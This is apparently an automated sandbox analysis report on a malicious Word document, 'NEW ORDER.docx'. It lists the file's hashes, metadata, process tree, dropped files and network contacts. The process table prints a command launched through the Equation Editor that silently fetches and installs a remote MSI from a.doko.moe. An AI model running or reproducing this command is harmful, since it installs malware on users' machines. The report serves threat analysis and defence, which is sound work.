Property | Value |
---|---|
File name | NEW ORDER.docx |
Full analysis | https://app.any.run/tasks/d892d0e4-3a18-49e4-8e48-ce8edba1b7e8 |
Verdict | Malicious activity |
Analysis date | November 14, 2018, 10:48:25 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MIME | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info | Microsoft Word 2007+ |
MD5 | 0CDF66E66C2F18FDCEC511C1BDF41252 |
SHA1 | D9E948393C873737477612C80988CE521DAE1EC5 |
SHA256 | 84CC492357968CCE6C5692D2D05B7EF0DAB10A53E8201FF8F652BDCC47C7EEB0 |
SSDEEP | 3072:a7lL2mrdFADYhDFc8rpKSvNYbWRDzUyRBelYc3nTMSFm9d+tlKpHE:a7lCAdFkYhDFBxvqyRmTMSFmfSz |
Extension | Description |
---|---|
.docx | Word Microsoft Office Open XML Format document (52.2) |
.zip | Open Packaging Conventions container (38.8) |
.zip | ZIP compressed archive (8.8) |
Property | Value |
---|---|
ZipRequiredVersion | 20 |
ZipBitFlag | 0x0006 |
ZipCompression | Deflated |
ZipModifyDate | 1980:01:01 00:00:00 |
ZipCRC | 0x2ea8411c |
ZipCompressedSize | 351 |
ZipUncompressedSize | 1364 |
ZipFileName | [Content_Types].xml |
Property | Value |
---|---|
Template | template.dotx |
TotalEditTime | - |
Pages | 1 |
Words | - |
Characters | 1 |
Application | Microsoft Office Word |
DocSecurity | None |
Lines | 1 |
Paragraphs | 1 |
ScaleCrop | No |
HeadingPairs | |
TitlesOfParts | - |
Company | - |
LinksUpToDate | No |
CharactersWithSpaces | 1 |
SharedDoc | No |
HyperlinksChanged | No |
AppVersion | 15 |
Keywords | - |
LastModifiedBy | Richard |
RevisionNumber | 2 |
CreateDate | 2018:11:06 07:34:00Z |
ModifyDate | 2018:11:06 07:34:00Z |
Title | - |
Subject | - |
Creator | Windows User |
Description | - |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
3568 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\NEW ORDER.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
3284 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe | User: admin; Company: Design Science, Inc.; Integrity Level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900 |
2340 | cmd.exe & /C CD C: & msiexec.exe /i https://a.doko.moe/mhyqwy.msi /quiet | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1619; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
2596 | msiexec.exe /i https://a.doko.moe/mhyqwy.msi /quiet | C:\Windows\system32\msiexec.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows® installer; Exit code: 1619; Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
3132 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | — | services.exe | User: SYSTEM; Company: Microsoft Corporation; Integrity Level: SYSTEM; Description: Windows® installer; Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
3076 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe | User: admin; Company: Design Science, Inc.; Integrity Level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900 |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR32B3.tmp.cvr | — | — | — |
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{333D0C73-56CC-4FD4-A6D8-D12A48F85650} | — | — | — |
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{0F93D533-5919-47F1-889C-1E2D01FF3409} | — | — | — |
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\44DB00D2.jpeg | — | — | — |
3568 | WINWORD.EXE | C:\Users\admin\~$W ORDER.docx | pgc | 43A82A21610F8F89731FD15A316D8279 | ACBE8EA4C14867109700FAEB93232772C7DD7D9598068E94E801A4594330D8F4 |
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD | binary | 370DA206497600CA81003C687DB73713 | AA92481A43E8B707C5D7CCABC554281A7BD4940A85AFFFA1B5B71CD7A909BB8F |
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{E4BBA9CA-981E-4E16-91C0-ECED2A50D48B}.FSD | binary | 32AC9E4B1EFB971B548B85A612F1A035 | 8D69181F48E915D3141B9AF34799677798DBDE7E734379799957D38AC76BC9D7 |
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF | binary | DD8EAD52DCCA697D84523C74E01FD7F0 | 98CCBBDA88B8DE279487D8B56DD44956FD16075C9D09574F4ED3F18AF26FC2B3 |
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{E3550006-2EEB-46A2-B6E5-A41FDB3F83AC}.FSD | binary | 4DC475D0667026D58CE8B8CD9640087B | 1747A80502D845AC394C14247316E2C795ECD1539526A809585F461D68D69B07 |
3568 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF | binary | E7F40C22E53BC53E0C3571625F398BB8 | 621034960E40B2288F274C8F5653DA61B95E5450AF36419BEE38E063A4A2A70D |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3568 | WINWORD.EXE | 185.83.214.16:443 | a.doko.moe | — | PT | suspicious |
964 | svchost.exe | 185.83.214.16:443 | a.doko.moe | — | PT | suspicious |
3132 | msiexec.exe | 185.83.214.16:443 | a.doko.moe | — | PT | suspicious |
Domain | IP | Reputation |
---|---|---|
a.doko.moe | | unknown |